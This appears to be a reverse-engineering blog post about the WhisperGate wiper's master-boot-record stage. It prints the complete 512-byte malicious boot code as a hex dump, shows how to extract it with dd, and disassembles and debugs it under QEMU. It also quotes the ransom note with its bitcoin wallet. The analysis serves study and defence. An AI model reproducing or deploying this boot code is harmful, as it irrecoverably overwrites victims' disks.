Many years ago, I read through a catalog of master’s courses. One of the first courses in the program is about operating systems. The very first topic they explore is how to create a custom, operating-system-agnostic bootloader from scratch.

Custom bootloaders, much like custom inits and custom kernels, have a place in my heart where a Linux hobbyist still exists. The process is not necessarily difficult, but it does require a lot of reading into some narrow topics (such as the IA-32 Software Developer’s Manual, or relevant ARM64 resources on the topic). It can quickly become challenging depending on what exactly you want to the boot code to do.

A good example of a widely known bootloader is GRUB. Most Linux desktop or server users know it through a handful of configurations and commands, like update-grub.

The grub-install command modifies the MBR on legacy BIOS systems, but most users aren’t interested in what it really does. Compared to a hand-written bootloader, the user may have limited visibility or control over the generated code. Often, it’s sufficient to know that it “just works.”

But where’s the fun in that?

Over the past decade, we’ve seen instances of ransomware and wipers leveraging MBR boot code for persistence and elevated privileges. My very first time hearing about MBR-based malware came with the reports of STUXNET. A few years later, a late friend in the Linux community had also brought it up (in a larger discussion about the desktop model’s attack surface).

This should raise a question: how difficult is it to write MBR malware? Before that, we should discuss the paramters for writing MBR boot code in general.

Malware in the MBR

Writing dubious or malicious boot code is a well-documented subject. If you’re new to the topic, I strongly recommend this writeup by Red Team Notes. It’s a fun starting point and a succint introduction.

An interesting, if unfortunate, consequence of MBR code is that it runs in 16-bit “Real Mode.” This limits the boot code a handful of rules and BIOS system interrupts.

Real-mode is also highly privileged. It runs well before the operating system loads, and therefore has precedence over Linux root or Windows Administrator privileges. If abused, this can cause severe damage to the system and hard disks, and the operating system may have no knowledge of it or any way to deter it.

An interesting feature of Real Mode is that it is operating-system agnostic by design. This means that you could develop a different malware loader for many operating systems or architectures that overwrites the victim’s MBR with the same boot code. In other words, while malware strands are often Windows-based, you could just as easily write a Linux or BSD variant and get the same outcome.

MBR boot code is more likely to use real mode only to execute a second stage in 32-bit “Protected Mode.” This second stage will contain more sophisticated boot code and is the basis of how bootloaders, including GRUB, operate behind the scenes. For malware authors, this could provide more opportunities for better attacks.

Most modern computers are likely to use UEFI, not BIOS, to boot. At the cost of some complexity, UEFI offers robust features such as Secure Boot, and generally has an easier time booting from flash storage, such as NVMe. This is usually a good thing.

So, why bring up MBR malware now? Lots of legacy systems still use BIOS. If your grandma is still playing Solitaire on her same Windows XP computer from the 2000s, she’s probably running BIOS with MBR. The same is true for agencies or organizations running the same systems from ten, twenty, or thirty years ago.

As malware in and of itself, STUXNET is often considered one of the greats. At least, it’s one of the most widely studied. You can certainly find samples online as well as an entire GitHub repo with the code reverse engineered in C.

However, there are plenty of other MBR-based malware samples from the past decade. A notable example is a NotPetya variant, which employed a malicious MBR in order to facilitate ransomware. But another MBR-based sample caught my eye fairly recently: WhisperGate.

WhisperGate

WhisperGate is “a multi-stage wiper designed to look like ransomware.” The bit about being a wiper disguised as ransomware cannot be understated. (It’s one reason why people will often recommend not to pay the attacker. With a wiper, the ransom money cannot recover your data, because even the attackers cannot recover your data.)

Campaigns which deployed WhisperGate targeted a handful of Ukrainian sectors, including government, nonprofit, and IT organizations. In September of last year, the group made headlines after the FBI arrested several Russian officials who were linked to the malware campaign.

A well-documented WhisperGate variant used three stages: one to corrupt the bootloader (T1542), another to download the third stage from a Discord server, and a final one to both tamper with Windows Defender and to overwrite files from a pre-set list of extensions.

The first stage caught my attention.

CrowdStrike describes the MBR-corrupting routine with the following pseudocode:

for i_disk between 0 and total_detected_disk_count do
   for i_sector between 1 and total_disk_sector_count, i_sector += 199, do
      overwrite disk i_disk at sector i_sector with hardcoded data
   done
done

Note: The bit about skipping 199 sectors was, and still is, interesting. My best guess here is coverage. By skipping every 199 sectors, you get a good-enough tradeoff for data corruption and total execution time.

If you run WhisperGate in a public sandbox, it will likely do nothing. One sandbox in particular marked it safe because it probed the registry for two keys and aborted execution. This is likely defense evasion (T1497), as the key values were empty because of the sandbox configuration.

There’s a very good writeup on the malware, which I would strongly recommend reading. It covers the details succinctly and was a true starting point for this guide.

In my walkthrough here, I’ll simply expand on these findings by investigating a few questions:

How could we determine this was MBR malware?
What does the MBR boot code look like in the binary?
How can you isolate the MBR boot code?
How would you analyze the boot code using static and dynamic analysis?

To that end, we will take “the hard way” to investigate the boot code. The tools used here are well-known and open source, so you can follow along or follow up on anything discussed here. This guide uses a Unix-like environment for analysis.

Of note, we will spend far less time on the malicious installer, and far more time on the aspects of it that deal with the MBR code. The boot code specifically is the main point of discussion.

Extracting the MBR code

First, we need a sample of this malware. Both the CrowdStrike and the S2W guides investigate the sample with the following SHA256 hash:

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

You can download this from sites like the Malware Bazaar. Unzip it with the password, and you’ll have an EXE whose name matches the hash value.

If you’re on a Linux system, use objdump.

If you’re on macOS, you can use the equivalent package from Homebrew:

/opt/homebrew/Cellar/x86_64-elf-binutils/<version>/bin/x86_64-elf-objdump

First, let’s confirm the file type:

$ file a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

In this case, the filename is the same value as the hash. This is useful for initial analysis, but it’s a pretty long filename. Let’s alias it to wg.exe just for clarity moving forward:

cp a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe wg.exe

Next, let’s dump strings (annotated):

$ strings wg.exe
(A) !This program cannot be run in DOS mode.
...
(B) AAAAA
Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us  $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.
...
(C) glob-1.0-mingw32
(D) GCC: (GNU) 6.3.0
...
(E) CreateFileW
...
(F) WriteFile
...

Of interest, we find:

A: PE header artifact
B: Ransom note, repeated several times
C, D: Evidence that MinGW and GCC were used to build this
E, F: File manipulation calls for Windows

There are other interesting strings, but this discussion is about the MBR code specifically, so let’s focus on that. We know from other research that WriteFile is the API function that overwrites the MBR. However, even without prior knowledge (or an entire writeup) of the installer, WriteFile is a good starting point for analysis, because it can indiscriminately overwrite sections of the hard drive.

With that in mind, let’s analyze focus on these strings specifically:

B tells us that the ransom note is not obfuscated or encrypted. This suggests that the MBR code may exist in cleartext, without any weird decoding or decryption routines. This makes it a low-hanging fruit for analysis.
F confirms that WriteFile is used in this sample.
The call to CreateFileW at E opens the primary hard drive for writing the corrupted MBR code. Its result, a HANDLE type, becomes the first parameter in the call to WriteFile.

Disassemble and search for the WriteFile section. Notice it’s stripped, so we can’t grep the disassembly for something like call WriteFile. Instead, we need to find the file offset.

We can use the following formula:

ImageBase + VirtualMemoryAddress = Offset

To get these values, call objdump with the -x parameter:

$ objdump -x wg.exe
...
ImageBase		00400000
...
	vma:     Ordinal  Hint  Member-Name  Bound-To
--[snip]--
	0000a180  <none>  04f3  WriteFile
...

In this case, the image base is 0x00400000 and the VMA offset is 0x0000a180

So:

0x400000 + 0xa180 = 0x40a180

If we grep the disassembly for references to 40a180, we end up in the import address table:

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 40a180 -B 4
    2ea0:	ff 25 94 a1 40 00    	jmp    DWORD PTR ds:0x40a194
    2ea6:	90                   	nop
    2ea7:	90                   	nop
    2ea8:	ff 25 80 a1 40 00    	jmp    DWORD PTR ds:0x40a180

Since the jmp statement for WriteFile is at address 0x2ea8, let’s grep for references to 2ea8 instead:

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 2ea8

    2ea8: ff 25 80 a1 40 00    jmp    DWORD PTR ds:0x40a180
    2ff9: e8 aa fe ff ff       call   0x2ea8

In addition to the IAT entry, we also see a call to the IAT address, which confirms that WriteFile is used in this code.

Recall earlier that many results appeared containing the ransom note. To find which one is actually used, we can backtrack the assembly:

$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 0x2ea8 -B 100
...
    2f7a:	be 20 40 40 00       	mov    esi,0x404020
...
    2f81:	8d bd e8 df ff ff    	lea    edi,[ebp-0x2018]
...
    2f91:	f3 a5                	rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
...
    2fd1:	8d 85 e8 df ff ff    	lea    eax,[ebp-0x2018]
...
    2fed:	c7 44 24 08 00 02 00 	mov    DWORD PTR [esp+0x8],0x200
    2ff4:	00 
    2ff5:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
    2ff9:	e8 aa fe ff ff       	call   0x2ea8

The text snippet here shows how the ransom note, located at 0x404020, is passed along as an argument to the WriteFile call at 0x2ff9. We could express the call line in C like:

WriteFile(fileHandle, (LPCVOID)0x404020, 0x200, 0, 0)

In this case, the data at 0x404020 contains the ransom note needed. 512 (0x200) bytes, the size of the MBR, are used in the call to WriteFile. This is likely the MBR code, but we want to prove it before relying on assumptions. So, let’s get the file offset and see what data exists there.

To find the file offset, first get the .data section’s VMA and File Offset:

$ objdump -x wg.exe
...
Sections:
Idx Name          Size      VMA       LMA       File off  Algn
...
  1 .data         00002038  00404000  00404000  00003200  2**5

We can determine the file offset with:

VirtualOffset - DataSectionVMA + DataSectionFileOffset

So:

0x404020 - 0x404000 + 0x3200 = 0x3220.

We can confirm this is correct using hexdump:

$ hexdump -C wg.exe | \
	grep 3220 -A $((0x1F))
00003220  eb 00 8c c8 8e d8 be 88  7c e8 00 00 50 fc 8a 04  |........|...P...|
00003230  3c 00 74 06 e8 05 00 46  eb f4 eb 05 b4 0e cd 10  |<.t....F........|
00003240  c3 8c c8 8e d8 a3 78 7c  66 c7 06 76 7c 82 7c 00  |......x|f..v|.|.|
00003250  00 b4 43 b0 00 8a 16 87  7c 80 c2 80 be 72 7c cd  |..C.....|....r|.|
00003260  13 72 02 73 18 fe 06 87  7c 66 c7 06 7a 7c 01 00  |.r.s....|f..z|..|
00003270  00 00 66 c7 06 7e 7c 00  00 00 00 eb c4 66 81 06  |..f..~|......f..|
00003280  7a 7c c7 00 00 00 66 81  16 7e 7c 00 00 00 00 f8  |z|....f..~|.....|
00003290  eb af 10 00 01 00 00 00  00 00 01 00 00 00 00 00  |................|
000032a0  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|
000032b0  64 20 64 72 69 76 65 20  68 61 73 20 62 65 65 6e  |d drive has been|
000032c0  20 63 6f 72 72 75 70 74  65 64 2e 0d 0a 49 6e 20  | corrupted...In |
000032d0  63 61 73 65 20 79 6f 75  20 77 61 6e 74 20 74 6f  |case you want to|
000032e0  20 72 65 63 6f 76 65 72  20 61 6c 6c 20 68 61 72  | recover all har|
000032f0  64 20 64 72 69 76 65 73  0d 0a 6f 66 20 79 6f 75  |d drives..of you|
00003300  72 20 6f 72 67 61 6e 69  7a 61 74 69 6f 6e 2c 0d  |r organization,.|
00003310  0a 59 6f 75 20 73 68 6f  75 6c 64 20 70 61 79 20  |.You should pay |
00003320  75 73 20 20 24 31 30 6b  20 76 69 61 20 62 69 74  |us  $10k via bit|
00003330  63 6f 69 6e 20 77 61 6c  6c 65 74 0d 0a 31 41 56  |coin wallet..1AV|
00003340  4e 4d 36 38 67 6a 36 50  47 50 46 63 4a 75 66 74  |NM68gj6PGPFcJuft|
00003350  4b 41 54 61 34 57 4c 6e  7a 67 38 66 70 66 76 20  |KATa4WLnzg8fpfv |
00003360  61 6e 64 20 73 65 6e 64  20 6d 65 73 73 61 67 65  |and send message|
00003370  20 76 69 61 0d 0a 74 6f  78 20 49 44 20 38 42 45  | via..tox ID 8BE|
00003380  44 43 34 31 31 30 31 32  41 33 33 42 41 33 34 46  |DC411012A33BA34F|
00003390  34 39 31 33 30 44 30 46  31 38 36 39 39 33 43 36  |49130D0F186993C6|
000033a0  41 33 32 44 41 44 38 39  37 36 46 36 41 35 44 38  |A32DAD8976F6A5D8|
000033b0  32 43 31 45 44 32 33 30  35 34 43 30 35 37 45 43  |2C1ED23054C057EC|
000033c0  45 44 35 34 39 36 46 36  35 0d 0a 77 69 74 68 20  |ED5496F65..with |
000033d0  79 6f 75 72 20 6f 72 67  61 6e 69 7a 61 74 69 6f  |your organizatio|
000033e0  6e 20 6e 61 6d 65 2e 0d  0a 57 65 20 77 69 6c 6c  |n name...We will|
000033f0  20 63 6f 6e 74 61 63 74  20 79 6f 75 20 74 6f 20  | contact you to |
00003400  67 69 76 65 20 66 75 72  74 68 65 72 20 69 6e 73  |give further ins|
00003410  74 72 75 63 74 69 6f 6e  73 2e 00 00 00 00 55 aa  |tructions.....U.|

Note that the final bytes are 55 aa, the magic bytes for MBR boot code. We can also see the ransom note in cleartext. This confirms that bytes 0x3220 - 0x3420 contain the MBR.

To isolate the boot code, use dd and extract it to wg.raw:

dd if=wg.exe of=wg-bootcode.raw bs=1 skip=$((0x3220)) count=$((0x200))

At this point, you could apply the boot code to a RAW image and try it out yourself. To supplement this walkthrough, I’ve shared a script that will simulate the outcome in QEMU, then dump the results for analysis. You can adjust the parameters to see how hard disks of different sizes are affected after N seconds (default 5 seconds over 10MB).

For now, you should convince yourself that malware will corrupt the hard drive. On to static analysis.

Analyzing the malicious boot code

Now we can disassemble only the 16-bit bootcode:

$ objdump -D -b binary \
	-mi386 \
	-Maddr16,data16,intel \
	wg-bootcode.raw

wg-bootcode.raw:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	eb 00                	jmp    0x2
   2:	8c c8                	mov    ax,cs
   4:	8e d8                	mov    ds,ax
   6:	be 88 7c             	mov    si,0x7c88
   9:	e8 00 00             	call   0xc
   c:	50                   	push   ax
   d:	fc                   	cld
   e:	8a 04                	mov    al,BYTE PTR [si]
  10:	3c 00                	cmp    al,0x0
  12:	74 06                	je     0x1a
  14:	e8 05 00             	call   0x1c
  17:	46                   	inc    si
  18:	eb f4                	jmp    0xe
  1a:	eb 05                	jmp    0x21
  1c:	b4 0e                	mov    ah,0xe
  1e:	cd 10                	int    0x10
  20:	c3                   	ret
  21:	8c c8                	mov    ax,cs
  23:	8e d8                	mov    ds,ax
  25:	a3 78 7c             	mov    ds:0x7c78,ax
  28:	66 c7 06 76 7c 82 7c 	mov    DWORD PTR ds:0x7c76,0x7c82
  2f:	00 00 
  31:	b4 43                	mov    ah,0x43
  33:	b0 00                	mov    al,0x0
  35:	8a 16 87 7c          	mov    dl,BYTE PTR ds:0x7c87
  39:	80 c2 80             	add    dl,0x80
  3c:	be 72 7c             	mov    si,0x7c72
  3f:	cd 13                	int    0x13
  41:	72 02                	jb     0x45
  43:	73 18                	jae    0x5d
  45:	fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
  49:	66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
  50:	00 00 
  52:	66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
  59:	00 00 
  5b:	eb c4                	jmp    0x21
  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
  64:	00 00 
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0
  6d:	00 00 
  6f:	f8                   	clc
  70:	eb af                	jmp    0x21
...

For now, it’s enough to note that the data corruption is a result of calling BIOS Interrupt 13h (disk operations) in mode 43h (extended write sectors to drive). The parameters for this interrupt:

Registers	Description
AH	43h = function number for extended write
AL	bit 0 = 0: close write check, bit 0 = 1: open write check, bit 1-7:reserved, set to 0
DL	drive index (e.g. 1st HDD = 80h)
DS:SI	segment:offset pointer to the DAP

You can refer to the disassembly to see where these parameters are set up and where the call occurs. I’ll refer back to them throughout the rest of this analysis.

A quick note: the virtual offset here is 0x7c00. This is a requirement for most (if not all) MBR code, as the boot code will load at this address. This is because real-mode boot code is just RAW data, and doesn’t follow a well-defined format like an ELF or PE. Put another way, the entire 512-byte image is treated as the “code section,” which is simply not accurate.

And that is important to know because the “data section” in this boot code is also not clearly defined as it would be in an ELF or PE file. That’s why you see statements like:

   2:	8c c8                	mov    ax,cs
   4:	8e d8                	mov    ds,ax

By storing the value of cs (code section) into ds (data section), the boot code is setting up the entire 512 bytes as writable data. This allows the boot code to use areas of the image data as data segments and obviates the need for explicit data segments or stack buffers. You can see this, in the usage of <SIZE> PTR ds:<address>, in lines like:

  45:	fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
  49:	66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
...
  52:	66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
...
  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
...
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0

For example, the byte at location 0x87 is used to store the current hard drive index. The actual location here is just after the “AAAAA” string in the data area:

                            Disk Index                          As String
--------------------------------v--------------------------- -------v--------
00000080  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|

We can see that the byte which holds the disk index is set to zero (0) initially. For each hard drive detected, this value will increase as the data-corruption routine continues. (Informationally, this also confirms that the malware will start by corrupting data on your primary hard drive.)

At the cost of using less intuitive code, this approach is rather brilliant given the space limitations of the MBR and its rigid boot-code specification.

Another note: the entire 512 bytes will disassemble, but anything after location 0x70 is just data, so its disassembly is incorrect. How can we infer that?

If you look at line 0x3c, you’ll note that si now contains the value at 0x7c72, which maps to offset 0x72 in the raw image. This is an argument in the interrupt 0x13 call, so it should point to data, not code. Notice also that no address prior to 0x7c72 is referenced anywhere in this code for use with data read-write operations.

We can infer that the boot code ends just before this, at 0x70, whose disassembly establishes that the data-corrupting routine will literally never halt. Anything after 0x70 that is just data meant for read-write purposes. Put another way, the boot code will not attempt to write any data before 0x70, hence the clipped disassembly earlier.

The MBR boot code displays a message and overwrites hard-drive sectors. I’m more interested in this second behavior, and the rest of the guide will focus exclusively on it. The research discussed earlier provides a good explanation, but we can expand on a few concepts that it left out: decompilation, DAP, and LBA.

Decompilation

Let’s start with decompilation. Something I found interesting at first was that the author didn’t decompile the MBR code. I tried it myself by hand, and again with Ghidra, and compared the results.

Note: To load the MBR binary into Ghidra, you’ll have to import the RAW file as x86 16-byte Real-Mode. When the disassembly listing loads, right-click the first line, then click Disassemble. This should produce the correct disassembly along with some attempts at decompiled logic.

MBR code is small, so it’s fairly easy to decompile on your own. My first attempt used a form of pseudocode. The result looked something like this:

while True, do
    ds = cs
    *((uint16_t *)(ds+0x78)) = cs
    *((uint32_t *)(ds+0x76)) = 0x82
    
    mode = 0x43                                  // Extended write mode
    write_check = 0                              // Disable write verification
    disk_index = *((uint8_t *)(ds+0x87)) + 0x80  // Start at disk 1
    dap_start_addr = 0x72                        // Read from file offset 0x72
    
    error, _ =  interrupt(
                    0x13: interrupt_code, 
                    mode: ah, 
                    write_check: al, 
                    disk_index: dl, 
                    dap_start_addr: si
                )
                
    if error == 1, then
        *((uint8_t *)(ds+0x87)) += 1
        *((uint32_t *)(ds+0x7a)) = 1
        *((uint32_t *)(ds+0x7e)) = 0
    else
        *((uint32_t *)(ds+0x7a)) = 0xc7
        *((uint32_t *)(ds+0x7e)) = cf
    end if
    
done

Something that makes BIOS interrupts challenging is their lack of mapping to C syntax. This pseudocode uses a syntax like:

interrupt(code, args...)

Where args... are register names passed in alphabetical order (AH, AL, DL, and SI). But still, there’s no “official” way to express this. In translating this to a high-level language, the “best” approach will likely assume that each register represents a global variable of the same name.

Many resources on reverse engineering will encourage you to write your own decompilation. The reason why is intuitive (learning moments), but sometimes it is also practical. To appreciate the practicality, let’s compare it to Ghidra’s decompilation of the same code block:

void FUN_0000_7c21(void)

{
  char *pcVar1;
  ulong *puVar2;
  long *plVar3;
  ulong uVar4;
  code *pcVar5;
  undefined2 unaff_CS;
  bool bVar6;
  
  do {
    while( true ) {
      *(undefined2 *)0x7c78 = unaff_CS;
      *(char **)0x7c76 = s_AAAAA_0000_7c82;
      bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
      pcVar5 = (code *)swi(0x13);
      (*pcVar5)();
      if ((bVar6) || (bVar6)) break;
      puVar2 = (ulong *)0x7c7a;
      uVar4 = *puVar2;
      *puVar2 = *puVar2 + 199;
      plVar3 = (long *)0x7c7e;
      *plVar3 = *plVar3 + (ulong)(0xffffff38 < uVar4);
    }
    pcVar1 = (char *)((int)s_AAAAA_0000_7c82 + 5);
    *pcVar1 = *pcVar1 + '\x01';
    *(undefined4 *)0x7c7a = 1;
    *(undefined4 *)0x7c7e = 0;
  } while( true );
}

Notice that these lines:

      bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
      pcVar5 = (code *)swi(0x13);
      (*pcVar5)();

Represent this assembly excerpt:

  35:	8a 16 87 7c          	mov    dl,BYTE PTR ds:0x7c87
  39:	80 c2 80             	add    dl,0x80
  3c:	be 72 7c             	mov    si,0x7c72
  3f:	cd 13                	int    0x13

In this case, the start of the data section (in SI) is not represented at all. It’s also not clear how bVar6, which includes the arguments, is being used (or if it’s used at all). This further complicates the next line:

      if ((bVar6) || (bVar6)) break;

The condition (bVar6) || (bVar6) seems redundant and appears to return a constant result. It appears to never break or always break, depending on the truthiness of the value. This is in sharp contrast to the IF/ELSE behavior, which is a bit more clear in the disassembly:

  41:	72 02                	jb     0x45  ; Error
  43:	73 18                	jae    0x5d  ; Success

I say “a bit more clear” because the JB and JAE mnemonics use the value in CF to determine where to jump, and that may be less forthcoming than a deliberate IF-ELSE like we use in higher-level languages. (In addition, the JB statement is unnecessary here.) Regardless, you may appreciate why some people still encourage the “hard way” of analyzing disassembled code over blindly trusting decompiled code.

Disk Address Packet (DAP)

Another area that was briefly touched on in the original analysis was the disk address packet (DAP). This is defined in the BIOS Enhanced Disk Drive Specification Version 3.0 documentation on page 4.

Offset	Type	Description
0	Byte	Packet size in bytes. Shall be 16 (10h) or greater. If the packet size is less than 16 the request is rejected with CF=1h and AH=01h. Packet sizes greater than 16 are not rejected, the additional bytes beyond 16 shall be ignored.
1	Byte	Reserved, must be 0
2	Byte	Number of blocks to transfer. This field has a maximum value of 127 (7Fh). A block count of 0 means no data is transferred. If a value greater than 127 is supplied the request is rejected with CF=1 and AH=01.
3	Byte	Reserved, must be 0
4	Double word	Address of transfer buffer. The is the buffer which Read/Write operations will use to transfer the data. This is a 32-bit address of the form Seg:Offset. If this field is set to FFFF:FFFF then the address of the transfer buffer is found at offset 10h
8	Quad word	Starting logical block address, on the target device, of the data to be transferred. This is a 64 bit unsigned linear address. If the device supports LBA addressing this value should be passed unmodified. If the device does not support LBA addressing the following formula holds true when the address is converted to a CHS value (…)

Note: Because we’re working with a 32-bit architecture in mind, I’m omitting the last two rows, which discuss 64-bit quadwords.

This represents 16 bytes (0x10 bytes) of total space. Recall earlier, we observe that the data at 0x7c72 is used for the DAP. We can use the physical offset to get a range

0x72 - (0x72 + 0x10) => 0x72 - 0x82

Let’s inspect these bytes:

00000070  eb af 10 00 01 00 00 00  00 00 01 00 00 00 00 00  |................|
00000080  00 00 41 41 41 41 41 00  59 6f 75 72 20 68 61 72  |..AAAAA.Your har|

This gives us a sequence:

10 00 01 00 00 00  00 00 01 00 00 00 00 00  00 00

This data structure is read as little endian, so the bytes will reverse. We can map this against the DAP specification:

File Offset	Value	Meaning
0x72	`0x10`	Constant 16 (0x10)
0x73	`0x00`	Constant 0
0x74	`0x01`	Transfer one block
0x75	`0x00`	Constant 0
0x76	`0x00000000`	Transfer buffer offset
0x7a	`0x0000000000000001`	Start at block one of the LBA

Recall that, at the beginning of this loop, the value at 0x76 was assigned the address of the ransom note:

  28:	66 c7 06 76 7c 82 7c 	mov    DWORD PTR ds:0x7c76,0x7c82

So the transfer buffer offset is really set to 0x00007c82 during runtime.

Note: Earlier, the value at cs is moved into the transfer buffer offset’s third byte. The purpose for this is not clear, as the instruction shown at offset 0x28 immediately overwrites it with a DWORD. This is the kind of thing that dynamic analysis will help answer.

The DAP uses these settings on the first invocation of INT 0x13 and on each error. It also resets the target LBA (0x7a - 0x81) to 1 when CF is 1 (indicating an error), when it retrieves the next disk:

fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
00 00 
66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
00 00 

If INT 0x13 is successful (CF == 0), the loop stays on the current disk, and iterates by 199 (0xc7) sectors, where it will attempt to overwrite data with the ransom message.

  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
  64:	00 00 
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0

What’s interesting to me is on offset 0x66. We could decompile this line as:

*((uint32_t *)(ds+0x7c7e)) += (0x0 + CF)

However, the branch leading to 0x5d is only possible if CF == 0. I don’t see how this adjusts anything about the next LBA. Perhaps dynamic analysis could shed light here.

Debugging

Debugging real-mode code is feasible with QEMU, but there are some limits with the way that newer versions handle it. I found it easier to install Debian 9 in a VM, update using the archive repos, and install its version of QEMU and GDB. It’s a small bit of setup, but it works fine.

$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 9.7 (stretch)
Release:	    9.7
Codename:	    stretch

$ uname -a
Linux ... 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

$ qemu-system-x86_64 --version
QEMU emulator version 2.8.1(Debian 1:2.8+dfsg-6+deb9u17)
Copyright (c) 2003-2016 Fabrice Bellard and the QEMU Project developers

$ apt-cache policy gdb qemu-system
gdb:
  Installed: 7.12-6
  Candidate: 7.12-6
  Version table:
 *** 7.12-6 500
        500 http://archive.debian.org/debian stretch/main amd64 Packages
        100 /var/lib/dpkg/status
qemu-system:
  Installed: 1:2.8+dfsg-6+deb9u17
  Candidate: 1:2.8+dfsg-6+deb9u17
  Version table:
 *** 1:2.8+dfsg-6+deb9u17 500
        500 http://archive.debian.org/debian-security stretch/updates/main amd64 Packages
        100 /var/lib/dpkg/status
     1:2.8+dfsg-6+deb9u9 500
        500 http://archive.debian.org/debian stretch/main amd64 Packages

Note: Newer versions of QEMU will display inaccurate disassembly. This is annoying and gets in the way of debugging efforts.

First, run the QEMU system with debug options:

qemu-system-i386 \
    -drive format=raw,file=disk.raw,index=0 \
    -s -S

-S and -s will launch a debugger on port 1234 and will pause execution so you can attach the debugger.

We can now use GDB:

$ gdb \
    -ex 'target remote localhost:1234' \
    -ex 'set architecture i8086' \
    -ex 'break *0x7c00' \
    -ex 'continue' \
    -ex 'set disassembly-flavor intel' \
    -ex 'x/36i $pc' \
    -q

Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0x0000fff0 in ?? ()
warning: A handler for the OS ABI "GNU/Linux" is not built into this configuration
of GDB.  Attempting to continue with the default i8086 settings.

The target architecture is assumed to be i8086
Breakpoint 1 at 0x7c00
Continuing.

Breakpoint 1, 0x00007c00 in ?? ()
=> 0x7c00:	jmp    0x7c02
   0x7c02:	mov    ax,cs
   0x7c04:	mov    ds,ax
   0x7c06:	mov    si,0x7c88
   0x7c09:	call   0x7c0c
   0x7c0c:	push   ax
   0x7c0d:	cld    
   0x7c0e:	mov    al,BYTE PTR [si]
   0x7c10:	cmp    al,0x0
   0x7c12:	je     0x7c1a
   0x7c14:	call   0x7c1c
   0x7c17:	inc    si
   0x7c18:	jmp    0x7c0e
   0x7c1a:	jmp    0x7c21
   0x7c1c:	mov    ah,0xe
   0x7c1e:	int    0x10
   0x7c20:	ret    
   0x7c21:	mov    ax,cs
   0x7c23:	mov    ds,ax
   0x7c25:	mov    ds:0x7c78,ax
   0x7c28:	mov    DWORD PTR ds:0x7c76,0x7c82
   0x7c31:	mov    ah,0x43
   0x7c33:	mov    al,0x0
   0x7c35:	mov    dl,BYTE PTR ds:0x7c87
   0x7c39:	add    dl,0x80
   0x7c3c:	mov    si,0x7c72
   0x7c3f:	int    0x13
   0x7c41:	jb     0x7c45
   0x7c43:	jae    0x7c5d
   0x7c45:	inc    BYTE PTR ds:0x7c87
   0x7c49:	mov    DWORD PTR ds:0x7c7a,0x1
   0x7c52:	mov    DWORD PTR ds:0x7c7e,0x0
   0x7c5b:	jmp    0x7c21
   0x7c5d:	add    DWORD PTR ds:0x7c7a,0xc7
   0x7c66:	adc    DWORD PTR ds:0x7c7e,0x0
   0x7c6f:	clc    
   0x7c70:	jmp    0x7c21
(gdb)

The disassembly matches the output from objdump, so the configuration works. The GDB command x/36i $pc, used as a command-line argument, dumps everything up to 0x70 (0x7c70 given the virtual offset). We can now run dynamic tests as needed.

There are a couple of things I want to test.

First, I want to prove that the carry flag CF is always set to zero, thereby confirming my suspicion that the instructions on lines 0x66 and 0x67 are redundant. We can prove this with a conditional breakpoint:

break *0x7c66 if $eflags 1
continue

This will break at line 0x66 only if CF == 1. You can continue execution. This condition is never triggered, and the process will continue indefinitely. We can conclude that the MOV statement is indeed useless.

Next, I want to see what value is actually set at 0x7c76, which falls in the range of the transfer buffer address. Restart the debugger and QEMU. Place a breakpoint at that instruction, continue execution, and inspect the values:

break *0x7c25
continue
...
info reg cs eax

Both AX and CS are set to 0x0. No change is made to the transfer buffer address. The purpose of this instruction is still not clear, but at least we know it’s not altering the code in any meaningful way.